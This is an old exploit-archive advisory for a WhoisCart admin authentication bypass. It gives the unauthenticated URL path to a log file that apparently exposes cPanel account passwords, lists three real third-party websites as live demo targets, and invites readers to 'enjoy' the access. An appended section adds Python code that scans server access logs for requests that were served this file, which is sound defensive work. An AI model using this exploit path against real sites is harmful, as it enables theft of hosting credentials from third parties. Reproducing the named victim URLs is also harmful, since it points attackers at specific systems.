# Title : WHOISCART (Auth Bypass) Information Disclosure Vulnerability
# Published : 2009-06-29
# Author : SecurityRules


+===================================================================================+
|                                                                                   |
|                                                                                   |
|                     WHOISCART ADMIN BYPASS                                        |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: Black Dream                                                              |
| Contact: Be5_at_HoTMail_dot_Fr                                                    |
| HoMe   : www.sec-r1z.com                                                          |
|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
+===================================================================================+
|                                                                                   |
| Script.: WHOISCART                                                                |
| Home...: http://whoiscart.net                                                     |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Exploit:                                                                          |
|                                                                                   |
| http://[website]/[script]/admin/hostinginterfaces/cpanel_1_log.htm                |
|                                                                                   |
| [+] Demo                                                                          |
|                                                                                   |
| http://www.denverwebhost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm   |
|                                                                                   |
| http://www.bearmedia.net/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm       |
|                                                                                   |
| http://thevillagehost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm      |
|                                                                                   |
|                                                                                   |
|                                                                                   |
| [+] Now you see all cpanel[s] account[pwd] xD   Pure admin                        |
|                                                                                   |
| [+] Enjoy xD                                                                      |
+-----------------------------------------------------------------------------------+

+===================================================================================+
|                                                                                   |
| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0              |
|                       And All #sec-r1z memb3rz!!!!                                |
+===================================================================================+
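
Added example, not part of the original advisory: a check an operator can run over their own web server access log to see whether the log file named above was ever served to a client. The combined log format, the broader *_log.htm pattern and the sample lines are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Only cpanel_1_log.htm is named in the advisory; matching any *_log.htm in
# that directory is an assumption made for this example.
LOG_PATH = re.compile(r"/admin/hostinginterfaces/[^/?\s]*_log\.htm", re.I)

# Apache/nginx "combined" access-log line.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_exposures(lines):
    """Map client IP -> [(timestamp, raw_url, bytes)] for each request where
    the server returned the log file's body (2xx, non-empty, not HEAD)."""
    served = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Decode %xx escapes and collapse '//' so obfuscated paths still match.
        path = re.sub(r"/{2,}", "/", unquote(m["url"]))
        if not LOG_PATH.search(path):
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        if m["status"].startswith("2") and size > 0 and m["method"] != "HEAD":
            served[m["ip"]].append((m["ts"], m["url"], size))
    return dict(served)

# Constructed sample lines (documentation IP ranges, invented sizes).
P = "/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm"
SAMPLE = [
    f'203.0.113.7 - - [29/Jun/2009:10:01:12 +0000] "GET {P} HTTP/1.1" 200 18233 "-" "-"',
    f'198.51.100.4 - - [29/Jun/2009:10:05:40 +0000] "GET {P} HTTP/1.1" 403 199 "-" "-"',
    '203.0.113.7 - - [29/Jun/2009:10:07:03 +0000] '
    '"GET /whoiscart/admin//%68ostinginterfaces/cpanel_1_log.htm HTTP/1.1" 200 18233 "-" "-"',
    f'192.0.2.55 - - [29/Jun/2009:10:09:30 +0000] "HEAD {P} HTTP/1.1" 200 - "-" "-"',
    '192.0.2.10 - - [29/Jun/2009:10:11:00 +0000] "GET /whoiscart/index.php HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for ip, hits in find_exposures(SAMPLE).items():
        for ts, url, size in hits:
            print(f"DISCLOSED to {ip} at {ts}: {url} ({size} bytes)")
```

Any hit means the cPanel passwords recorded in that file should be treated as disclosed and rotated, and the admin/ directory should require authentication at the web server level.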

# www.Syue.com [2009-06-29]